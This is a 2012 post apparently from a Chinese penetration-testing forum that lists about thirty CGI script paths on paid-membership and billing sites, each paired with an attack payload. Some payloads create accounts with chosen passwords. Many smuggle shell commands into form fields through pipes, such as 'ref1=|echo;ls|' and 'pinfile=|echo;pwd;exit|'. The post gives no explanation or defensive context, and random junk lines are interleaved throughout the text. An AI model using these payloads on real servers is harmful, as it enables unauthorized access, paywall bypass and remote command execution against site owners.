中国网络渗透测试联盟
标题:
Cgi-bin 30个漏洞+使用方法
[打印本页]
作者:
admin
时间:
2012-9-13 16:55
标题:
Cgi-bin 30个漏洞+使用方法
==============================
- t Q" `! G$ k% q$ c. a
. l' r2 {3 U3 Y
/smspass.pl
x, u) q+ z5 F) p$ P N: `! v
username=username&password=password
6 ~* U/ ~; W0 t3 J- x
[9 Q5 C7 g1 c* Y/ M9 u' S
/index.cgi
( _7 l, I$ e' x) _. T- H5 D
wei=ren&gen=command
2 I( [7 j" l) |# n9 F m1 q
0 M0 V$ i5 Y/ K4 C- X
/passmaster.cgi
* z8 n, E" L+ v0 P z! h) r9 h7 W s [
Action=Add&Username=Username&Password=Password
* @9 g, z# v* ]+ C: C7 l
# D! T( |4 }7 [- Q6 y
/accountcreate.cgi
$ J+ t5 _! N- F( \5 H: n
username=username&password=password&ref1=|echo;ls|
$ c* E0 D; C/ |$ L. U; ?; K
9 k6 Y! T& C' @
/form.cgi
, W3 x& P5 Z" Z0 T0 f" O
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
7 o' |3 U/ L; o$ O! V
; Y- ~, F- q: a5 C
/addusr.pl
, Y3 |, S6 |: [- \2 j# E; t8 p# m; t
/cgi-bin/EuroDebit/addusr.pl
( _ `' Z% [- j! F9 i& ]( f
user=username&pass=Password&confirm=Password
; {$ J6 x9 I+ }) V
: u4 T& U$ T% C( ^# f- K" M
/ccbill-local.asp
/ S! E7 ?( I: @
post_values=username:password
8 }+ P0 R5 o; Y4 i. v
: M* W8 L9 z& n1 h! @
/count.cgi
* r, ?* H/ _* V0 s, l
pinfile=|echo;ls -la;exit|
$ z* K1 a9 P9 k
& q* e D) v. X3 U7 O
/recon.cgi
3 O5 K9 a6 \% C9 m5 u, i) n
/recon.cgi?search
. H7 s" U" F8 F1 p9 J0 Y% v
searchoption=1&searchfor=|echo;ls -al;exit|
$ j0 U: C9 p4 b1 f% |, p
2 f8 x, e+ T- K$ w; v4 o! I- {) T+ J
/verotelrum.pl
! _" f7 B1 W% A+ F* l2 M* @
vercode=username:password:dseegsow:add:amount<&30>
: `5 U& G2 T4 i8 {1 Q
% Q4 F5 y) d% a
/af.cgi
) W) d4 L) U. P( }
_browser_out=|echo;ls -la;exit;|
. V) W0 H' e) A" L
6 o% w, p3 j" @2 `
/modify.cgi
7 d3 R- K$ b- { s3 E Y& A! K2 A
username=username&password=password&expire=30
& a& I+ |2 ?1 T0 G
6 c4 ~2 @3 M8 N2 w
/openjournal.cgi
, \ k2 k8 k2 e
edit=1&ct=2&go=|echo;ls -al;exit|
0 i5 J: B0 K4 ~. C+ x
: i8 Z& m, w1 F6 y
/gx9passwd.cgi
5 G! h0 S. B* h2 D
cmd=ADD&user=username&pass=password
$ U/ _, U& L, r% ?5 }+ X8 y
$ ~8 r; p$ U* \( l* c3 l: s h
/probecontrol.cgi
1 p9 J" y6 j, [5 [3 k
command=enable&username=username&password=password
3 a# b4 f$ Z! W7 @
2 |: w' }0 t2 g( D$ ?
/recon.cgi
7 m, J6 d8 W8 [# {6 K9 L
searchoption=3&searchfor=echo;ls -la;exit
h/ {- D0 v) C/ M3 s
0 R. X- Z' H& \# o! g9 z) J
/htadd.pl
' y: p+ D; p; \6 z, ~
configfile=|echo; ls -alt; exit
$ A. o6 n5 @' {
# \3 m c* X% q2 Z3 G y6 B8 @
/gx9passwd.cgi
) J- h) o3 l8 Z* t
cmd=ADD&user=username&pass=password
w ?- v; B8 ^
3 D" Z. k, m! F" I$ U3 F# n# k
/ibill*.pl
5 t4 d0 i0 K0 O) m* L0 q. g5 D
reqtype=add&authpwd=authpwd&username=username&password=password
) Q" P( I8 v) C3 Y+ n% [
M D# q$ |, l: ^9 ^) o* a. \
/cpay.cgi
" I3 k5 ?; S: N0 P, G5 E
command=add_member&username=username(EMAIL)&password=password(DES)
, h9 q8 l( v0 ^. r" I
! G* H& Z3 ~: C; r, t
/globill_ut.cgi
$ [. B% T3 s1 l& W! {
do=add&username=username&password=password&wpassword=password
$ J3 {/ E8 C7 n3 i
. w7 Q% `% [ z
/usercontrol.cgi
, \ e/ F8 N7 E* V/ f0 Z" v
command=enable&username=USER&password=PASS
: s6 Z% K2 G! ]! G; l( }7 j* m9 T
' f d7 g# j7 o+ H u
/globoSALErum.cgi
1 D! }7 T, J! q) }. i
action=ADD&seccode=seccode&login=username&password=password
6 J' Y( y- @* v$ D( ]' S4 \
* K. k" U* d( ]
/addusr.pl
5 R7 V1 e2 a% l* _0 a. K
user=USER&pass=PASS&confirm=PASS
6 d* o g; }0 U \8 x1 p& l6 l, }" C
3 W" T- ]" N; R4 Z% G5 ^. e+ c
/pincount.cgi
, N5 m, s& \) t) [: T- N! x
/cgi-bin/mastergate/pincount.cgi
7 Z) q: k# r2 I* S; ?
pinfile=|echo;pwd;exit|
- `1 N- E* S! n8 h$ r# O* _
! S# ^' c; T2 ]- \. F+ m
/accountcreate.cgi
) K' |! J9 z! S. p
/cgi-bin/gateway/accountcreate.cgi
+ K" Q7 p0 g ~7 E3 z
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
4 n5 Q+ {. S; v3 [# l" {
' t' @8 T$ x- R
/af.cgi
8 C8 O/ Y/ {3 L* |8 x1 \; f& A8 Q
/env.cgi
/ b! ~0 S1 J5 P6 |) a
ADD+;echo;pwd;exit
% G" O1 b+ U9 i5 W8 W3 ]1 h
) e1 n o2 O5 X P( _5 U
/count.cgi
N0 i& j5 L! K" b6 U: f
pinfile=|echo;pwd;exit|
8 `4 b# m4 V+ i+ D
* Z. F, s7 T/ y H( Z" m& F- C
/recon.cgi
) i- ` v( G0 C, P3 N: z. ^/ x
searchoption=1&searchfor=|echo;ls%20-al;exit|
( _2 q5 Q% w5 A ~& ~3 V
6 U' \3 _# C( u5 j/ M# b1 k
/add.cgi
+ T: n2 L" p% ^- u3 ?- S
username=username&password=password&expire=30
$ E8 A7 f7 b I
9 j5 u) e9 h4 Y, C2 Z. j* H& M
==============================
% O7 ` L. W2 \( D/ h# g8 w* i8 A
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2